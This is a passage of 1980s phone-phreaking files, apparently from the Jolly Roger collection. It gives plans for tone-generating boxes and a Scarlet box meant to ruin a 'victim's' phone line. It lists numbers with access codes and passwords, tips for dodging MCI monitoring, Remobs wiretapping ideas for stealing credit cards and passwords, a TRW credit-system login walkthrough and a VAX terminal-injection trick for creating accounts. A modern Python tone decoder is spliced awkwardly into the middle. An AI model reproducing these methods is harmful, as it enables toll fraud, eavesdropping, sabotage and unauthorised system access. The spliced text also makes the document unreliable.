GAATL 8 20 4 32
CASJO 4 26 4 34
WIMIL 4 16 4 24
CAOAK 4 8 4 16
CAPAL 4 8 0 12
CASFA 6 10 4 20
ORPOR 2 6 0 8
AZPHO 4 12 4 20
MNMIN 4 14 4 22
MABOS 4 20 8 32
TXHOU 8 24 10 42
CACOL 4 10 4 18
CASAN 4 12 4 20
CASDI 4 14 4 22
UTSLC 4 14 4 22
FLTAM 4 10 4 18
MOKCI 4 12 4 20
CAGLE 4 18 4 26
CASAC 4 8 4 16
NCRTP 4 12 4 20
Total 166 562 170 898
Average 4.8823529 16.529412 5 26.411765
I think the statistics basically speak for themselves. I am sure there will no
doubt be hundreds of people who will not smile at the number of specific kinds
of ports supported, not to mention the number
of 'dead' or 'down' modems you will find when you verify the totals. Usually, 2%
to perhaps 10% of the modems are 'dead' with specific ones repeatedly failing
week after week.
History Of This Collection:
Almost a year ago a small, select group of devoted individuals got together to
discuss problems with the PC-Pursuit Network. In the middle of our discussions a
question was asked as to how the
network really processes our calls. This was intended to help us assess SET
commands and other such matters. When the address hypothesis was offered we
quickly set out to prove it. It was proved
in about 3 minutes with the discovery of 2011 (First try was xxx1). The data has
continually been collected and analyzed ever since, but until now, has never
been mass released.
A small group of teenage hackers discovered several interesting things that can
be done with these addresses -- many of which will not be discussed here, short
of mentioning that the ports connected
to via these addresses are not limited to PC-Pursuiters. You can, however, fight
"dead" dialout modems in cities via the address method. Dead modems can be
located in about 10 seconds (faster than
Telenet), and can either be reported or skipped past by the user connecting to
the next modem in the sequence after the "dead" one. (Note: Say 2011.3 is dead,
connect to 2011.4 and you will be past
it. If 2011.4 is busy, go to 2011.5. The reader should notice 2011.3 is the same
as 2011C.)
The most interesting value of these addresses is that one can count the number
of ports that Telenet keeps so secret (Grin). When there were only 28 cities in
operation there were an average of 2.7
300 baud, 9.4 1200 baud, and 2.5 2400 baud modems in each city. Some cities had
as few as 2 modems on a port and as many as 12. Only recently has the number
of modems per city begun to
jump.
How To Update The Count Yourself:
An ID is not required to "request" one of these ports, thus the tallying can be
done any time of day by simply typing the number at the @ prompt. Here is an
example with four modems (NJNEW/24):
@20122.1
201 22A REFUSED COLLECT CONNECTION 19 80
@20122.2
201 22B REFUSED COLLECT CONNECTION 19 80
@20122.3
201 22C REFUSED COLLECT CONNECTION 19 80
@20122.4
201 22D REFUSED COLLECT CONNECTION 19 80
@20122.5
201 22E ILLEGAL ADDRESS 19 80
The reader should be aware that PC-Pursuit ports always respond with '19 80'. Do
not confuse it with '19 00', which are not PC-Pursuit ports. In the above
example we know there are four ports
because the fourth was the last existing port before we encountered the 'ILLEGAL
ADDRESS.' There are several ways to signify that you have gone one beyond the
end of the ports:
1. xxx xxx ILLEGAL ADDRESS 19 80
2. xxx xxx NOT OPERATING 19 80
3. The request freezes (Note: Issue a BREAK then D <C/R> to abort the attempt
yielding 'ATTEMPT ABORTED'.)
You should be aware that modems which are out of order in the middle of the
sequence can respond with 'NOT OPERATING' or may freeze the request. You should
also note that when updating the
existing list, all you need to do is try to request the next modem beyond the
end as of the last check.
Finding Newly Added Ports:
Many ports have not yet been installed; hence, we do not yet know the addresses.
New ports may be found by entering the first three digits of the area code and
appending (1-29, 101-129, 201-229,
301-329, etc.) until the 'REFUSED COLLECT CONNECTION 19 80' appears. Once this
is found, simply log onto the port address with your ID and R/V dial some silly
series of digits,
disconnect the port, then connect to the PC-Pursuit mnemonic you think it might
be and R/V redial the last number. If the numbers match, you found it.
98. Pearl Box Plans by The Jolly Roger
The Pearl Box: Definition - This is a box that may substitute for many boxes
which produce tones in hertz. The Pearl Box when operated correctly can produce
tones from 1-9999hz. As you can see,
2600, 1633, 1336 and other crucial tones are obviously in its sound spectrum.
Materials you will need:
1. C1, C2: .5mf or .5uf ceramic disk capacitors
2. Q1.....NPN transistor (2N2222 works best)
3. S1.....Normally open momentary SPST switch
4. S2.....SPST toggle switch
5. B1.....Standard 9-Volt battery
6. R1.....Single turn, 50k potentiometer
7. R2.....Single turn, 100k potentiometer
8. R3.....Single turn, 500k potentiometer
9. R4.....Single turn, 1Meg potentiometer
10. SPKR...Standard 8-ohm speaker
11. T1.....Mini transformer (8-ohm works best)
12. Misc...Wire, solder, soldering iron, PC board or perfboard, box to contain
the completed unit, battery clip
Instructions for building Pearl Box:
Since the instructions are EXTREMELY difficult to explain in words, you will be
given a schematic instead. It will be quite difficult to follow but try it
anyway.
(Schematic for The Pearl Box)
+---+------------+---------+
! ! \
C1 C2 \
! ! +
+ + -----+T1
!\ +------------+-+
! b c-------! +
! Q1 ! +-S1-
! e-----S2---+ ! SPKR
! ! ! +----
! B1 !
! ! !
! +-------+
!R1 R2 R3 R4!
/\/\ /\/\ /\/\ /\/\
+--+ +--+ +--+
Now that you are probably thoroughly confused, let me explain a few minor
details. The potentiometer area is rigged so that the left pole is connected to
the center pole of the potentiometer next to it.
The middle terminal of T1 is connected to the piece of wire that runs down to
the end of the battery.
Correct operation of The Pearl Box:
You may want to get some dry-transfer decals at Radio Shack to make this job a
lot easier. Also, some knobs for the tops of the potentiometers may be useful
too. Use the decals to calibrate the knobs. R1 is the knob for the ones place,
R2 is for the tens place, R3 is for the hundreds place and R4 is for the
thousands place. S1 is for producing the tones and S2 is for power.
1. Turn on the power and adjust the knobs for the desired tone.
(Example: For 2600 hz-R1=0:R2=0:R3=6:R4=2)
2. Hit the push-button switch and VOILA! You have the tone. If you don't have a
tone, recheck all connections and the schematic.
99. The Phreak file by The Jolly Roger
202 282 3010 UNIV. OF D.C.
202 553 0229 PENTAGON T.A.C.
202 635 5710 CATHOLIC UNIV. OF AMERICA
202 893 0330 DEFENSE DATA NETWORK
202 893 0331 DEFENSE DATA NETWORK
202 965 2900 WATERGATE
203 771 4930 TELEPHONE PIONEERS
206 641 2381 VOICE OF CHESTER
212 526 1111 NEW YORK FEED LINE
212 557 4455 SEX HOT LINE
212 799 5017 ABC NY FEED LINE
212 934 9090 DIAL-AN-IDIOT
212 976 2727 P.D.A.
212 986 1660 STOCK QUOTES
213 541 2462 STOCK MARKET REPORTS
213 547 6801 NAVY SHIPS INFO
213 576 6061 " "
213 664 3321 NEWS FOR THE BLIND
301 393 1000 " "
301 667 4280 LOTTERY INFO
312 939 1600 " "
404 221 5519 NUCLEAR COMMISSION
408 248 8818 1ST NATIONAL BANK
415 642 2160 EARTHQUAKE REPORT
505 883 6828 " "
512 472 2181 " "
512 472 4263 WEIRD RECORDING
512 472 9833 " "
512 472 9941 INSERT 25 CENTS
512 472 9941 SPECIAL RECORDING
512 870 2345 " "
516 794 1707 " "
619 748 0002 LOOP LINE
619 748 0003 " "
703 331 0057 MCI (5 DIGITS)
703 334 6831 WASH. POST
703 354 8723 COMPEL INC.
703 737 2051 METROPHONE (6 DIGITS)
703 835 0500 VALNET (5 DIGITS)
703 861 7000 SPRINT (6/8 DIGITS)
703 861 9181 SPRINT (6/8 DIGITS)
714 974 4020 CA. MAINFRAME
716 475 1072 N.Y. DEC-SYSTEM
800 222 0555 RESEARCH INSTITUTE
800 223 3312 CITIBANK
800 227 5576 EASTERN AIRLINES
800 248 0151 WHITE HOUSE PRESS
800 321 1424 FLIGHT PLANES
800 323 3026 TEL-TEC (6 GIGITS)
800 323 4756 MOTOROLA DITELL
800 323 7751 MCI MAINFRAME
800 325 4112 EAsYLINK
800 325 6397 FYI
800 344 4000 MSG SYSTEM
800 368 6900 SKYLINE ORDER LINE
800 424 9090 RONALD REAGAN'S PRESS
800 424 9096 WHITE HOUSE SWITCH
800 438 9428 ITT CITY CALL SWITCHING
800 521 2255 AUTONET
800 521 8400 TRAVELNET (8 DIGITS)
800 526 3714 RCA MAINFRAME
800 527 1800 TYMNET
800 621 3026 SPECIAL OPERATOR
800 621 3028 " "
800 621 3030 " "
800 621 3035 " "
800 631 1146 VOICE STAT
800 821 2121 BELL TELEMARKETING
800 828 6321 XEROX $
800 858 9313 RECORD-A-VOICE
800 882 1061 AT&T STOCK PRICES
914 997 1277 " "
916 445 2864 JERRY BROWN
N/A 950 1000 SPRINT
N/A 950 1022 MCI EXECUNET
N/A 950 1033 US TELEPHONE
N/A 950 1044 ALLNET (6 DIGITS)
N/A 950 1066 LEXITEL
N/A 950 1088 SKYLINE (6 DIGITS)
-----------------------------------
PHONE # | DESCRIPTION/CODE
-----------------------------------
201-643-2227 | CODES:235199, 235022 AND 121270
|
800-325-4112 | WESTERN UNION
|
800-547-1784 | CODES:101111, 350009 AND 350008
|
800-424-9098 | TOLL FREE WHITE HS.
|
800-424-9099 | DEFENSE HOT LINE
|
202-965-2900 | WATERGATE
|
800-368-5693 | HOWARD BAKER HOTLINE
|
202-456-7639 | REAGANS SECRETARY
|
202-545-6706 | PENTAGON
|
202-694-0004 | PENTAGON MODEM
|
201-932-3371 | REUTERS
|
800-325-2091 | PASSWORD: GAMES
|
800-228-1111 | AMERICAN EXPRESS
|
617-258-8313 | AFTER CONNECT PRESS CTRL-C
|
800-323-7751 | PASSWORD:REGISTER
|
800-322-1415 | CODES:266891, 411266 AND 836566 (USED BY SYSOP)
The following 800 #'s have been collected; however, no codes have been found
yet! If you hack any, please let me know...
800 numbers with carriers.
1-800 numbers of the government.
800-321-1082:NAVY FINANCE CENTER.
800-424-5201:EXPORT IMPORT BANK.
800-523-0677:ALCOHOL TOBACCO AND.
800-532-1556:FED INFORMATION CNTR.
800-325-4072:COMBAT & ARMS SERVICE.
800-325-4095:COMBAT SUPPORT BRANCH.
800-325-4890:ROPD USAR COMBAT ARMS.
800-432-3960:SOCIAL SECURITY.
800-426-5996:PUGET NAVAL SHIPYARD.
Directory of toll free numbers.
301-234-0100:BALTIMORE ELECTRIC.
202-456-1414:WHITE HOUSE.
202-545-6706:PENTAGON.
202-343-1100:EPA.
714-891-1267:DIAL-A-GEEK.
714-897-5511:TIMELY.
213-571-6523:SATANIC MESSAGES.
213-664-7664:DIAL-A-SONG.
405-843-7396:SYNTHACER MUSIC.
213-765-1000:LIST OF MANY NUMBERS.
512-472-4263:WIERD.
512-472-9941:INSERT 25.
203-771-3930:PIONEERS.
213-254-4914:DIAL-A-ATHIEST.
212-586-0897:DIRTY.
213-840-3971:HOROWIERD
800-521-8400:VOICE ACTIVATED
213-992-8282:METROFONE ACCESS NUMBER
617-738-5051:PIRATE HARBOR
617-720-3600:TIMECOR #2
301-344-9156:N.A.S.A PASSWORD:GASET
318-233-6289:UNIVERSITY LOUISIANA
213-822-2112:213-822-3356
213-822-1924:213-822 3127
213-449-4040:TECH CENTER
213-937-3580:TELENET
After entering the sprint code, and, C+Destination number. Then enter this
number: "205#977#22", And the main tracer for sprint will be disabled.
215-561-3199/SPRINT LONG DISTANCE
202-456-1414/WHITE HOUSE
011-441-930-4832/QUEEN ELIZABETH
916-445-2864/JERRY BROWN
800-424-9090/RONALD REAGAN'S PRESS
212-799-5017/ABC NEW YORK FEED LINE
800-882-1061/AT & T STOCK PRICES
212-986-1660/STOCK QUOTES
213-935-1111/WIERD EFFECTS!
512-472-4263/WIERD RECORDING
212-976-2727/P.D.A.
619-748-0002/FONE CO. TESTING LINES
900-410-6272/SPACE SHUTTLE COMM.
201-221-6397/AMERICAN TELEPHONE
215-466-6680/BELL OF PENNSYLVANIA
202-347-0999/CHESAPEAKE TELEPHONE
213-829-0111/GENERAL TELEPHONE
808-533-4426/HAWAIIAN TELEPHONE
312-368-8000/ILLINOIS BELL TELEPHONE
317-265-8611/INDIANA BELL
313-223-7233/MICHIGAN BELL
313-223-7223/NEVADA BELL
207-955-1111/NEW ENGLAND TELEPHONE
201-483-3800/NEW JERSEY BELL
212-395-2200/NEW YORK TELEPHONE
515-243-0890/NORTHWESTERN BELL
216-822-6980/OHIO BELL
206-345-2900/PACIFIC NORTHWEST BELL
213-621-4141/PACIFIC TELEPHONE
205-321-2222/SOUTH CENTRAL BELL
404-391-2490/SOUTHERN BELL
203-771-4920/SOUTHERN NEW ENGLAND
314-247-5511/SOUTHWESTERN BELL
414-678-3511/WISCONSIN TELEPHONE
800-327-6713/UNKNOWN ORIGIN
303-232-8555/HP3000
315-423-1313/DEC-10
313-577-0260/WAYNE STATE
512-474-5011/AUSTIN COMPUTERS
516-567-8013/LYRICS TIMESHARING
212-369-5114/RSTS/E
415-327-5220/NEC
713-795-1200/SHELL COMPUTERS
518-471-8111/CNA OF NY
800-327-6761/AUTONET
800-228-1111/VISA CREDIT CHECK
713-483-2700/NASUA
213-383-1115/COSMOS
408-280-1901/TRW
404-885-3460/SEARS CREDIT CHECK
414-289-9988/AARDVARK SOFTWARE
919-852-1482/ANDROMEDA INCORPORATED
213-985-2922/ARTSCI
714-627-9887/ASTAR INTERNATIONAL
415-964-8021/AUTOMATED SIMULATIONS
503-345-3043/AVANT GARDE CREATIONS
415-456-6424/BRODERBUND SOFTWARE
415-658-8141/BUDGE COMPANY
714-755-5392/CAVALIER COMPUTER
801-753-6990/COMPUTER DATA SYSTEMS
213-701-5161/DATASOFT INC.
213-366-7160/DATAMOST
716-442-8960/DYNACOMP
213-346-6783/EDU-WARE
800-631-0856/HAYDEN
919-983-1990/MED SYSTEMS SOFTWARE
312-433-7550/MICRO LAB
206-454-1315/MICROSOFT
301-659-7212/MUSE SOFTWARE
209-683-6858/ON-LINE SYSTEMS
203-661-8799/PROGRAM DESIGN (PDI)
213-344-6599/QUALITY SOFTWARE
303-925-9293/SENTIENT SOFTWARE
702-647-2673/SIERRA SOFTWARE
916-920-1939/SIRIUS SOFTWARE
215-393-2640/SIR-TECH
415-962-8911/SOFTWARE PUBLISHERS
415-964-1353/STRATEGIC SIMULATIONS
217-359-8482/SUBLOGIC COM.
206-226-3216/SYNERGISTIC SOFTWARE
Here are a few tips on how not to get caught when using MCI or other such
services:
1. Try not to use them for voice to voice personal calls. Try to use them for
computer calls only. Here is why:
MCI and those other services can't really trace the calls that come through the
lines, they can just monitor them. They can listen in on your calls and from
that, they can get your name and
other information from the conversation. They can also call the number you
called and ask your friend some questions. If you call terminals and BBS'S then
it is much harder to get information. For one
thing, most sysops won't give these dudes that call any info at all or they will
act dumb because they PHREAK themselves!
2. Beware when using colored boxes! They are easy to find!!!!!
3. Try to find a sine-wave number. Then use an MCI or other service to call it.
You will hear a tone that goes higher and lower. If the tone just stops, then
that code is being monitored and you
should beware when using it.
If you do get caught, then if you think you can, try to weasel out of it. I have
heard many stories about people that have pleaded with the MCI guys and have
been let off. You will get a call from a guy
that has been monitoring you. Act nice. Act like you know it is now wrong to do
this kind of thing.....just sound like you are sorry for what you did. (If you
get a call, you probably will be a little sorry!)
Otherwise, it is very dangerous!!!!!!! (Very with a capital V!)
100. Red Box Plans by The Jolly Roger
Red boxing is simulating the tones produced by public payphones when you drop
your money in. The tones are beeps of 2200Hz + 1700Hz. A nickel is 1 beep for 66
milliseconds. A dime is 2 beeps, each 66 milliseconds with a 66 millisecond
pause between beeps. A quarter is 5 beeps, each 33 milliseconds with a 33
millisecond pause between beeps.
There are two methods commonly used by Phreaks to make free calls.
1. An electronic hand-held device that is made from a pair of Wien-bridge
oscillators with the timing controlled by 555 timing chips.
2. A tape recording of the tones produced by a home computer. One of the best
computers to use would be an Atari ST. It is one of the easier computers to use
because the red box tones
can be produced in basic with only about 5 statements.
101. RemObS by The Jolly Roger
Some of you may have heard of devices called Remobs which stands for Remote
Observation System. These Devices allow supposedly authorized telephone
employees to dial into them from
anywhere, and then using an ordinary touch tone fone, tap into a customer's line
in a special receive only mode. [The mouthpiece circuit is deactivated, allowing
totally silent observation from any fone in
the world (Wire tapping without a court order is against the law)]
How Remobs Work
Dial the number of a Remob unit. Bell is rumored to put them in the 555
information exchanges, or on special access trunks [Unreachable except via blue
box]. A tone will then be heard for
approximately 2 seconds and then silence. You must key in (In DTMF) a 2 to 5
digit access code while holding each digit down at least 1 second. If the code
is not entered within 5 or 6 seconds, the
Remob will release and must be dialed again. If the code is supposedly another
tone will be heard. A seven digit subscriber fone number can then be entered
[The Remob can only handle certain
'exchanges' which are prewired, so usually one machine cannot monitor an entire
NPA]. The Remob will then connect to the subscribers line. The listener will
hear the low level idle tone as long as the
monitored party is on hook. As the monitored party dials [rotary or DTMF], the
listener would hear [And Record] the number being dialed. Then the ENTIRE
conversation, datalink, whatever is taking
place, all without detection. There is no current box which can detect Remob
observation, since it is being done with the telephone equipment that makes the
connection. When the listener is finished
monitoring of that particular customer, he keys the last digit of the access
code to disconnect him from the monitored line and return to the tone so that
he can key in another 7 digit fone number. When
the listener is totally finished with the Remob, he keys a single 'disconnect
digit' which disconnects him from the Remob so that the device can reset and be
ready for another caller.
History of Remobs
Bell has kept the existence of Remobs very low key. Only in 1974, Bell
acknowledged that Remobs existed. The device was first made public during
hearings on "Telephone Monitoring Practices by
Federal Agencies" before a subcommittee on government operations. House of
Representatives, Ninety-Third Congress, June 1974. It has since been stated by
Bell that the Remob devices are used
exclusively for monitoring Bell employees such as operators, information
operators, etc., to keep tabs on their performance. [Suuureee, we're stupid]
Possible Uses for Remobs
The possible uses of Remobs are almost as endless as the uses of self created
fone line. Imagine the ability to monitor bank lines etc, just off the top of my
head I can think of these applications:
Data Monitoring of:
· TRW
· National Credit Bureau.
· AT&T Cosmos.
· Bank Institutions.
· CompuServe and other Networks.
Voice Monitoring of:
· Bank Institutions.
· Mail Order businesses.
· Bell Telephone themselves.
· Any place handling sensitive or important information.
· Anyone that you may not like.
With just one Remob, someone could get hundreds of credit cards, find out who
was on vacation, get CompuServe passwords by the dozens, disconnect peoples
fones, do credit checks, find out
about anything that they may want to find out about. I'm sure you brilliant can
see the value of a telephone hobbyist and a telecommunications enthusiast
getting his hands on a few choice Remobs.
<Grin>
Caution
If any reader should discover a Remob during his (or her) scanning excursions,
please keep in mind the very strict federal laws regarding wiretapping and
unauthorized use of private Bell property.
102. Scarlet Box Plans by The Jolly Roger
The purpose of a Scarlet box is to create a very bad connection, it can be used
to crash a BBS or just make life miserable for those you seek to avenge.
Materials:
· 2 alligator clips
· 3 inch wire, or a resistor (plain wire will create greatest amount of static)
(Resistor will decrease the amount of static in proportion to the resistor you
are using)
1. Find the phone box at your victim's house, and pop the cover off.
2. Find the two prongs that the phone line you wish to box are connected to.
3. Hook your alligator clips to your (wire/resistor).
4. Find the lower middle prong and take off all wires connected to it, I think
this disables the ground and call waiting and shit like that.
5. Now take one of the alligator clips and attach it to the upper most prong,
and take the other and attach it to the lower middle prong.
6. Now put the cover back on the box and take off!!
** ######## **
** # #### # **
######## /
# #### # /
######## /
/
/
/
/
/
/
/
**/
**
**
**
**
**
(**)= prongs
**
(/) = (wire/resistor)
(##)= some phone bullshit
103. Silver Box Plans by The Jolly Roger
Introduction:
First a bit of Phone Trivia. A standard telephone keypad has 12 buttons. These
buttons, when pushed, produce a combination of two tones. These tones represent
the row and column of the button
you are pushing.
       1209  1336  1477
697    (1)   (2)   (3)
770    (4)   (5)   (6)
851    (7)   (8)   (9)
941    (*)   (0)   (#)
So (1) produces a tone of 697+1209, (2) produces a tone of 697+1336, etc.
Function:
The Silver Box just creates another column of buttons, with the new tone of
1633. These buttons are called A, B, C, and D.
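The row and column pairing described above, including the 1633 column, can be checked from the receiving side with a tone decoder. This is an added example, not part of the original text: a Goertzel-filter DTMF detector in Python run over a constructed signal. The 8 kHz sample rate, 40 ms frame, thresholds and all function names are assumptions, and the third row uses the standard 852 Hz where the table above prints 851.

```python
import math

# Standard DTMF grid (ITU-T Q.23); the standard third row is 852 Hz.
ROWS = (697, 770, 852, 941)
COLS = (1209, 1336, 1477, 1633)      # 1633 Hz is the A-D column
KEYS = ("123A", "456B", "789C", "*0#D")

RATE = 8000    # assumed sample rate in Hz
FRAME = 320    # assumed analysis frame: 40 ms at 8 kHz


def goertzel_power(samples, freq, rate=RATE):
    """Normalised power at `freq`: about A**2 for a sine of amplitude A."""
    n = len(samples)
    if n == 0:
        return 0.0
    coeff = 2.0 * math.cos(2.0 * math.pi * freq / rate)
    s1 = s2 = 0.0
    for x in samples:
        s1, s2 = x + coeff * s1 - s2, s1
    power = s1 * s1 + s2 * s2 - coeff * s1 * s2
    return power / (n / 2.0) ** 2


def _strongest(samples, freqs, min_power, dominance):
    """Index of the one clearly dominant frequency in `freqs`, or None."""
    powers = [goertzel_power(samples, f) for f in freqs]
    order = sorted(range(len(freqs)), key=powers.__getitem__, reverse=True)
    best, runner_up = powers[order[0]], powers[order[1]]
    if best < min_power or best < dominance * runner_up:
        return None
    return order[0]


def detect_key(samples, min_power=0.01, dominance=8.0):
    """Decode one frame: needs exactly one row tone and one column tone."""
    row = _strongest(samples, ROWS, min_power, dominance)
    col = _strongest(samples, COLS, min_power, dominance)
    if row is None or col is None:
        return None
    return KEYS[row][col]


def decode_stream(samples, frame=FRAME):
    """Decode a sample stream into keys, one key per tone burst."""
    keys, previous = [], None
    for start in range(0, len(samples) - frame + 1, frame):
        key = detect_key(samples[start:start + frame])
        if key is not None and key != previous:
            keys.append(key)
        previous = key
    return "".join(keys)


def synth_key(key, duration=0.08, amplitude=0.5, rate=RATE):
    """Constructed test input: the two-tone burst for `key`."""
    row = next(i for i, r in enumerate(KEYS) if key in r)
    col = KEYS[row].index(key)
    count = round(duration * rate)
    return [amplitude * (math.sin(2 * math.pi * ROWS[row] * n / rate)
                         + math.sin(2 * math.pi * COLS[col] * n / rate))
            for n in range(count)]


def silence(duration=0.08, rate=RATE):
    """Constructed test input: a gap between bursts."""
    return [0.0] * round(duration * rate)


if __name__ == "__main__":
    # '6' and 'B' share the 770 Hz row and differ only in the column tone.
    signal = (synth_key("6") + silence() + synth_key("B")
              + silence() + synth_key("D"))
    print(decode_stream(signal))
```

A frame that carries only a row tone, or only silence, decodes to nothing, which is why a detector of this shape does not mistake single-frequency noise for a key press.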
Usefulness:
Anyone who knows anything about phreaking should know that in the old days of
phreaking, phreaks used hardware to have fun instead of other people's Sprint
and MCI codes. The most famous
(and useful) was the good ol' Blue Box. However, Ma Bell decided to fight back
and now most phone systems have protections against tone-emitting boxes. This
makes boxing just about futile in most
areas of the United States (i.e. those areas with Crossbar or Step-By-Step). If
you live in or near a good-sized city, then your phone system is probably
up-to-date (ESS) and this box (and most
others) will be useless. However, if you live in the middle of nowhere (no
offense intended), you may find a use for this and other boxes.
Materials:
· 1 Foot of Blue Wire
· 1 Foot of Gray Wire
· 1 Foot of Brown Wire
· 1 Small SPDT Switch (*)
· 1 Standard Ma Bell Phone
(*)SPDT = Single Pole/Double Throw
Tools:
· 1 Soldering Iron
· 1 Flat-Tip Screwdriver
Procedure:
1. Loosen the two screws on the bottom of the phone and take the casing off.
2. Loosen the screws on the side of the keypad and remove the keypad from the
mounting bracket.
3. Remove the plastic cover from the keypad.
4. Turn the keypad so that *0# is facing you. Turn the keypad over. You'll see a
bunch of wires, contacts, two Black Coils, etc.
5. Look at the Coil on the left. It will have five (5) Solder Contacts facing
you. Solder the Gray Wire to the fourth Contact Pole from the left.
6. Solder the other end of the Gray Wire to the Left Pole of the SPDT Switch.
7. Find the Three (3) Gold-Plated Contacts on the bottom edge of the keypad. On
the Left Contact, gently separate the two touching Connectors (they're soldered
together) and spread them
apart.
8. Solder the Brown Wire to the Contact farthest from you, and solder the other
end to the Right Pole of the SPDT Switch.
9. Solder the Blue Wire to the Closest Contact, and the other end to the Center
Pole of the SPDT Switch.
10. Put the phone back together.
Using The Silver Box:
What you have just done is install a switch that will change the 369# column
into an ABCD column. For example, to dial a 'B', switch to Silver Box Tones and
hit '6'.
No one is sure of the A, B, and C uses. However, in an area with an old phone
system, the 'D' button has an interesting effect. Dial Directory Assistance and
hold down 'D'. The phone will ring, and
you should get a pulsing tone. If you get a pissed-off operator, you have a
newer phone system with defenses against Silver Boxes. At the pulsing tone, dial
a 6 or 7. These are loop ends.
104. Bell Trashing by The Jolly Roger
The Phone Co. will go to extremes on occasions. In fact, unless you really know
what to expect from them, they will surprise the heck out of you with their
"unpublished tariffs". Recently, a situation
was brought to my attention that up till then I had been totally unaware of,
least to mention, had any concern about. It involved garbage! The phone co. will
go as far as to prosecute anyone who
rummages through their garbage and helps himself to some
Of course, they have their reasons for this, and no doubt benefit from such
action. But, why should they be so picky about garbage? The answer soon became
clear to me: those huge metal bins are
filled up with more than waste old food and refuse... Although it is Pacific
Tele. policy to recycle paper waste products, sometimes employees do overlook
this sacred operation when sorting the
garbage. Thus top-secret confidential Phone Co. records go to the garbage bins
instead of the paper shredders. Since it is constantly being updated with
"company memorandums", and supplied with
extensive reference material, the Phone co. must continually dispose of the
outdated materials. Some phone companies are supplied each year with the
complete "System Practices" guide. This
publication is an over 40 foot long library of reference material about
everything to do with telephones. As the new edition arrives each year, the old
version of "System Practices" must also be thrown
out.
I very quickly figured out where some local phone phreaks were getting their
material. They crawl into the garbage bins and remove selected items that are of
particular interest to them and their fellow
phreaks. One phone phreak in the Los Angeles area has salvaged the complete 1972
edition of "Bell System Practices". It is so large and was out of order (the
binders had been removed) that it took
him over a year to sort it out and create enough shelving for it in his garage.
Much of this "Top Secret" information is so secret that most phone companies
have no idea what is in their files. They have their hands full simply replacing
everything each time a change in wording
requires a new revision. It seems they waste more paper than they can read!
It took quite a while for Hollywood Cal traffic manager to figure out how all of
the local phone phreaks constantly discovered the switchroom test numbers.
Whenever someone wanted to use the testboard, they found the local phone phreaks
on the lines talking to all points all over the world. It got to the point where
the local garbage buffs knew more
about the office operations than the employees themselves. One phreak went so
far as to call in and tell a switchman what his next daily assignment would be.
This, however, proved to be too much.
The switchman traced the call and one phone phreak was denied the tool of his
trade.
In another rather humorous incident, a fellow phreak was rummaging through the
trash bin when he heard someone approaching. He pressed up against the side of
the bin and silently waited for the
goodies to come. You can imagine his surprise when the garbage from the
lunchroom landed on his head. Most people find evenings best for checking out
their local Telco trash piles. The only thing
necessary is a flashlight and, in the case mentioned above, possibly a rain
coat. A word of warning though, before you rush out and dive into the trash
heap. It is probably illegal, but no matter where
you live, you certainly won't get the local policeman to hold your flashlight
for you.
105. Canadian WATS Phonebook by The Jolly Roger
800-227-4004 ROLM Collagen Corp.
800-227-8933 ROLM Collagen Corp.
800-268-4500 Voice Mail
800-268-4501 ROLM Texaco
800-268-4505 Voice Mail
800-268-6364 National Data Credit
800-268-7800 Voice Mail
800-268-7808 Voice Mail
800-328-9632 Voice Mail
800-387-2097 Voice Mail
800-387-2098 Voice Mail
800-387-8803 ROLM Canadian Tire
800-387-8861 ROLM Canadian Tire
800-387-8862 ROLM Canadian Tire
800-387-8863 ROLM Canadian Tire
800-387-8864 ROLM Canadian Tire
800-387-8870 ROLM Halifax Life
800-387-8871 ROLM Halifax Life
800-387-9115 ASPEN Sunsweep
800-387-9116 ASPEN Sunsweep
800-387-9175 PBX [Hold Music = CHUM FM]
800-387-9218 Voice Messenger
800-387-9644 Carrier
800-426-2638 Carrier
800-524-2133 Aspen
800-663-5000 PBX/Voice Mail [Hold Music = CFMI FM]
800-663-5996 Voice Mail (5 rings)
800-847-6181 Voice Mail
NOTES: Each and every one of these numbers is available to the 604 (British
Columbia) Area Code. Most are available Canada Wide and some are located in the
United States. Numbers designated
ROLM have been identified as being connected to a ROLM Phonemail system. Numbers
designated ASPEN are connected to an ASPEN voice message system. Numbers
designated VOICE MAIL
have not been identified as to equipment in use on that line. Numbers designated
carrier are answered by a modem or data set. Most Voice Message systems, and ALL
Rolms, sound like an answering
machine. Press 0 during the recording when in a rolm, * or # or other DTMF in
other systems, and be propelled into another world...
106. Hacking TRW by The Jolly Roger
When you call TRW, the dial up will identify itself with the message
"TRW". It will then wait for you to type the appropriate answer back (such as
CTRL-G). Once this has been done, the system will say "CIRCUIT BUILDING IN
PROGRESS" along with a few numbers. After this, it clears the screen (CTRL-L)
followed by a CTRL-Q. After the system sends the CTRL-Q, it is ready for the
request. You first type the 4 character identifier for the geographical area of
the account.
(For Example) TCA1 - for certain Calif. & Vicinity subscribers.
TCA2 - A second CALF. TRW System.
TNJ1 - Their NJ Database.
TGA1 - Their Georgia Database.
The user then types A <CR> and then on the next line, he must type his 3 char.
option. Most requests use the RTS option. OPX, RTX, and a few others exist.
(NOTE: TRW will accept an A, C, or S as the 'X' in the options above.) Then
finally, the user types his 7 digit subscriber code. He appends his 3-4
character password after it. It seems that if you manage to get hold of a TRW
printout (trashing at Sears, Saks, etc. or from getting your credit printout
from them), their subscriber code will be on it, leaving only a 3-4 character
p/w up to you.
For Example,
(Call the DialUp)
TRW System Types, (ST) CTRL-G
(You type, YT) Circuit building in progress 1234
(ST) CTRL-L CRTL-Q (TCA1 CYT) BTS 3000000AAA
<CR><CRTL-S> (YT]
Note: This system is in Half Duplex, Even Parity, 7 Bits per word and 2 Stop
Bits.
CAUTION: It is a very stressed rumor that after typing in the TRW password Three
(3) times.. It sets an Automatic Number Identification on your ass, so be
careful. And forget who told you how to
do this..
107. Hacking Vax's & Unix by The Jolly Roger
Unix is a trademark of AT&T (and you know what that means)
In this article, we discuss the unix system that runs on the various vax
systems. If you are on another unix-type system, some commands may differ, but
since it is licensed to bell, they can't make many
changes.
Hacking onto a unix system is very difficult, and in this case, we advise having
an inside source, if possible. The reason it is difficult to hack a vax is this:
Many vax, after you get a carrier from them,
respond=>
Login:
They give you no chance to see what the login name format is. Most commonly used
are single words, under 8 digits, usually the person's name. There is a way
around this: Most vax have an acct.
called 'suggest' for people to use to make a suggestion to the system root
terminal. This is usually watched by the system operator, but at late he is
probably at home sleeping or screwing someone's
brains out. So we can write a program to send at the vax this type of a message:
A screen freeze (Cntl-S), screen clear (system dependant), about 255 garbage
characters, and then a command to
create a login acct., after which you clear the screen again, then unfreeze the
terminal. What this does: When the terminal is frozen, it keeps a buffer of what
is sent. Well, the buffer is about 127
characters long. so you overflow it with trash, and then you send a command line
to create an acct. (System dependant). After this you clear the buffer and
screen again, then unfreeze the terminal. This
